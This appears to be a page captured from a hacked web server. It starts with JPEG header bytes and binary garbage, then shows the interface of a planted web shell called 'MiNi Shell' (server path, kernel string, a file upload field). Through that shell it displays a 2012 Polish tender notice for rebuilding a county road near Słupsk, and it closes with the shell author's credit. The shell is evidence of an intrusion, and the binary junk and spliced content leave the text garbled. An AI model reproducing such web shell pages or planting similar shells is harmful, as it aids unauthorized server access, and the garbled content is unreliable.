JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121211/504244-N-2012.html

<p class="kh_header"><b>Słupsk: Przebudowa drogi powiatowej nr 1170G Kwakowo - Lubuń - Etap II</b><br>
<b>Numer ogłoszenia: 504244 - 2012; data zamieszczenia: 11.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Słoneczna 16e, 76-200 Słupsk, woj. pomorskie, tel. 059 8420730, 0598420269, faks 0598420284.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 1170G Kwakowo - Lubuń - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.Zakres rzeczowy zamówienia:
A.
Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych przebudowy drogi powiatowej Nr 1170G KWAKOWO-LUBUŃ na odcinku od m. Kwakowo do obiektu mostowego na rzece Słupi na długości ok. 2000m. Roboty będą polegały na poszerzeniu istniejącej jezdni do 5,0m na odcinku od m.Kwakowo  do obiektu mostowego, wykonanie dokumentacji projektowej z podziałem na trzy części: 
I część:odcinek przebudowy od m.Kwakowo  do obiektu mostowego,
II część: odcinek drogi powiatowej w miejscowości Kwakowo 
oraz III część: odcinek drogi gminnej.
3.2.
Opis robót: 
A.
Należy zaprojektować i wykonać:
1) w miejscach koniecznych poszerzenie istniejącej nawierzchni do szerokości 5,0m (konstrukcja 20 cm-  kruszywo łamane 0/31,5 stabilizowany mechanicznie 4 cm warstwa wiążąca z betonu asfaltowego dla ruchu KR1-2 i 4 cm warstwa ścieralna z  betonu asfaltowego dla ruchu KR1-2)
2) wzmocnienie nawierzchni drogi i obrębów skrzyżowań (warstwa ścieralna 4 cm i warstwa profilowa 3 cm z betonu asfaltowego dla ruchu KR1-2)
3) wykonanie obustronnego pobocza utwardzonego o szerokości 0,75m
4)wykonanie kanalizacji deszczowej i wodociągowej w miejscowości Kwakowo
Szczegóły techniczne podane są w załączonym do SIWZ - Programie Funkcjonalno-Użytkowym- załącznik nr 8
Uwaga!
Do oferty należy dołączyć wstępny kosztorys inwestorski na roboty budowlane.
  3.4.
Wspólny słownik zamówień CPV:
74232200-6 Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej
45233252-0 Roboty w zakresie nawierzchni ulic 
45233222-1 Roboty w zakresie chodników 
3.5.
W ramach wynagrodzenia Wykonawca zabezpieczy na własny koszt obsługę geodezyjną oraz sporządzi inwentaryzację geodezyjną powykonawczą na mapie w skali 1:500.
3.6.
Wykonawca przed przystąpieniem do robót ma obowiązek uzgodnić z Zamawiającym dokumentację projektową.
3.7.
W przypadku stwierdzenia, że roboty wykonywane są niezgodnie z obowiązującymi przepisami
Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z
winy Wykonawcy.
3.8.
Zaleca się Wykonawcom przeprowadzenie szczegółowej wizji lokalnej w terenie celem uzyskania
wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy. Każdy z 
Wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków
realizacji zamówienia.
3.9.
Zamawiający wymaga od Wykonawcy udzielenia gwarancji na wykonane roboty budowlane,
stanowiące przedmiot niniejszego zamówienia na okres nie krótszy niż 36 miesięcy licząc od daty
 bezusterkowego odbioru ostatecznego całego zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY MOŻE UDZIELIĆ ZAMÓWIEŃ UZUPEŁNIAJĄCYCH do 50% wartości
 zamówienia podstawowego w trybie zamówień z wolnej ręki na zasadach określonych w art. 67
 ust. 1 pkt 6 ustawy PZP.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6, 45.23.32.52-0, 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.
Zamawiający żąda wadium w wysokości 15.000 PLN (słownie: piętnaście tysięcy PLN).
2.
Wadium wnosi się przed upływem terminu składania ofert.
3.
Wadium musi obejmować cały okres związania ofertą.
4.
Wadium może być wnoszone w jednej lub kilku następujących formach: 
A.
pieniądzu, przelewem na rachunek Zamawiającego w Bank Spółdzielczy Ustka 94 9315 0004 0050 6791 2000 0030
B.
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
C.
gwarancjach bankowych;
E.
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9    listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
5.
Wadium wniesione w formie pieniądza powinno być oznaczone w następujący sposób Wadium ZDP.GI Z.343.21.2012 . Kopię dowodu wniesienia wadium potwierdzoną za zgodność z oryginałem przez Wykonawcę zaleca się dołączyć do oferty.
6.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7.
Jako termin wniesienia wadium w formie pieniądza zostanie przyjęty termin uznania na rachunku      Zamawiającego.
8.
Jeżeli Wykonawca wnosi wadium w innej formie niż pieniądz, oryginał dokumentu wadium należy dołączyć do oferty. 
9.
Wadium wniesione w formie poręczenia lub gwarancji bankowej, gwarancji ubezpieczeniowej musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 46 ust. 4a i  5 Ustawy.
10.
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty                   najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy.
11.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu                    zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
12.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed 
upływem terminu składania ofert.
13.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako           najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
14. 
Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z 
umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty 
prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez  Wykonawcę.
15.
Zgodnie z art. 46 ust. 4a Ustawy Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli          Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
16.
Zgodnie z art. 46 ust.5 Ustawy Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli             Wykonawca, którego oferta została wybrana:
A.
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w    ofercie;
B
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
C
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>co najmniej jedną osobą posiadającą uprawnienia budowlane do prowadzenia robót objętych przedmiotem zamówienia w zakresie branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
co najmniej jedną osobę posiadającą uprawnienia do projektowania w zakresie branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
co najmniej jedną osobę posiadającą uprawnienia do projektowania robót budowlanych o specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych.
Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tzn. posiada niezbędną wiedzę i doświadczenie w zakresie wykonania robót budowlanych  odpowiadających robotom budowlanym stanowiącym przedmiot zamówienia lub tj. wykonał w okresie pięciu ostatnich lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane dotyczące budowy lub przebudowy dróg systemem zaprojektuj i zbuduj, każda o wartości brutto nie mniejszej niż 350.000,00 zł lub jedna na kwotę 600.000,00, potwierdzone referencjami lub będzie dysponował ww. wiedzą i doświadczeniem;
Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>co najmniej jedną osobą posiadającą uprawnienia budowlane do prowadzenia robót objętych przedmiotem zamówienia w zakresie branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
co najmniej jedną osobę posiadającą uprawnienia do projektowania w zakresie branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
co najmniej jedną osobę posiadającą uprawnienia do projektowania robót budowlanych o specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych.
Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. 
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
Należy załączyć polisę na kwotę min. 600.000,00 ;
ma zabezpieczone środki na rachunku bankowym lub posiada zdolność kredytową umożliwiającą wykonanie zamówienia do 500.000,00 PLN

Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą spełnia albo nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy w sprawie niniejszego zamówienia publicznego zawarty jest w Załączniku nr 7 do 
SIWZ.
Zamawiający nie zamierza zawrzeć umowy ramowej
Strony w umowie ustalą następujące terminy realizacji robót:
Termin przekazanie placu budowy ustala się do 5 dni roboczych licząc od daty podpisania
 umowy:.....................................
Termin rozpoczęcia robót:........................................
Termin zakończenia robót:...................................
Zamawiający w dniu podpisania umowy wymaga od Wykonawcy przedstawienia harmonogramu
 rzeczowo-finansowego.
Zamawiający zobowiązuje się do zapłaty faktury zarówno za wykonanie dokumentacji projektowej jak i wykonanie robót budowlanych przelewem  na konto Wykonawcy, w terminie 30 dni licząc od daty  jej doręczenia do siedziby Zamawiającego wraz z dokumentami rozliczeniowymi tj rozliczenie rzeczowo-finansowe - kosztorys powykonawczy oraz  operatem kolaudacyjnym w skład którego wchodzą:
a) oświadczenie inspektora nadzoru w sprawie potwierdzenia zakończenia robót i dokonania ich odbioru
b) oświadczenie kierownika budowy w sprawie zakończenia robót budowlanych 
c) sprawozdanie techniczne
d) powykonawcza dokumentacja techniczna (kosztorys powykonawczy )
e) recepty 
f) opinia technologiczna
g) wyniki pomiarów i badań kontrolnych
h) wyniki badań mieszanek mineralno -bitumicznych
i) atesty i deklaracje zgodności wbudowanych materiałów 
j) geodezyjna inwentaryzacja powykonawcza  wykonawca zabezpieczy na własny koszt obsługę geodezyjną oraz sporządzi inwentaryzację geodezyjną powykonawczą na mapie w skali 1:500 podpisaną przez inspektora nadzoru i kierownika robót.
Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian do treści zawartej umowy Załączniku nr 7 do SIWZ w następujących przypadkach: 
zmiany przepisów prawnych, w tym zmiany stawki od podatku od towarów i usług mającej
zastosowanie do przedmiotu umowy, 
wydania decyzji, postanowień lub innych aktów organów administracji publicznej bądź instytucji
kontrolujących działania Zamawiającego mających wpływ na wykonanie przedmiotu umowy, o ile
okoliczności te powodują konieczność zmiany wysokości, wartości lub sposobu spełnienia
świadczeń stron. 
termin zakończenia przedmiotu umowy może ulec zmianie wyłącznie z przyczyn niezawinionych i niezależnych od Wykonawcy takich jak:
występują warunki pogodowe uniemożliwiające prowadzenie robót- silne opady deszczu  lub śniegu utrzymujące się przez okres kolejnych trzech dni następujących po sobie,
jeśli w okresie realizacji kanalizacji deszczowej wystąpią warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych tj. utrzymująca się przez okres co najmniej pięciu następujących po sobie dni temperatura -5°C udokumentowana pomiarami wykonanymi na budowie i potwierdzonymi wpisem dziennika budowy przez Wykonawcę oraz Inspektora Nadzoru.     
 nastąpiła konieczność przeprowadzenia badań archeologicznych, które wstrzymują możliwość
robót budowlanych,
stwierdzono obecność niewybuchów, które stwarzają niebezpieczeństwo dla życia,
wstrzymano roboty za względu na roszczenia osób trzecich do własności gruntu lub innych nieruchomości, 
nastąpiło wstrzymanie prac przez pracowników organów państwowych zgodnie z obowiązującym prawem ,
opóźnienie niewynikające z winy Wykonawcy, w zakresie otrzymania decyzji administracyjnej związanych z pracami projektowymi
Ponadto Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w następującym zakresie zmiany osób wskazanych przez Wykonawcę do pełnienia funkcji przez: 
osobę posiadającą uprawnienia budowlane do prowadzenia robót objętych przedmiotem zamówienia w zakresie branży drogowej
co najmniej jedną osobę posiadającą uprawnienia do projektowania w zakresie branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,  
co najmniej jedną osobę posiadającą uprawnienia do projektowania robót budowlanych o specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych.
W żadnym wypadku postanowień klauzuli pkt.20.6. nie należy interpretować jako
udzielenie dowolnej ze stron roszczenia do żądania zmiany umowy, a jedynie jako możliwość 
dokonania zmiany umowy. 
Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz
 wymaga zgody drugiej strony. 

 Strony nie będą ponosiły żadnej odpowiedzialności za częściowe lub całkowite nie wywiązanie się ze zobowiązań umownych spowodowanych przypadkami siły wyższej. Przez siłę wyższą rozumie się wszelkie wydarzenia, których nie można było przewidzieć przy podpisywaniu umowy spowodowane wyjątkowymi okolicznościami, takimi jak: pożar, powódź, trzęsienie ziemi i inne kataklizmy przyrodnicze mające charakter siły wyższej. 
Strona poszkodowana przez siłę wyższą jest zobowiązana do bezzwłocznego poinformowania na piśmie drugiej strony o jej wystąpieniu. W przypadku niespełnienia tego obowiązku, strona zainteresowana traci prawo do powoływania się na siłę wyższą. 
Po zakończeniu trwania siły wyższej, druga strona powinna być o tym natychmiast poinformowana.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zdp.slupsk.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Słupsku 
Adres: ul. Słoneczna 16e, 76-200 Słupsk
Numer tel. (0 -59)8420 730, fax: (0 - 59)8420 284; 
Adres strony internetowej: http://bip.zdp.slupsk.pl/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.12.2012 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Słupsku 
Adres: ul. Słoneczna 16e, 76-200 Słupsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com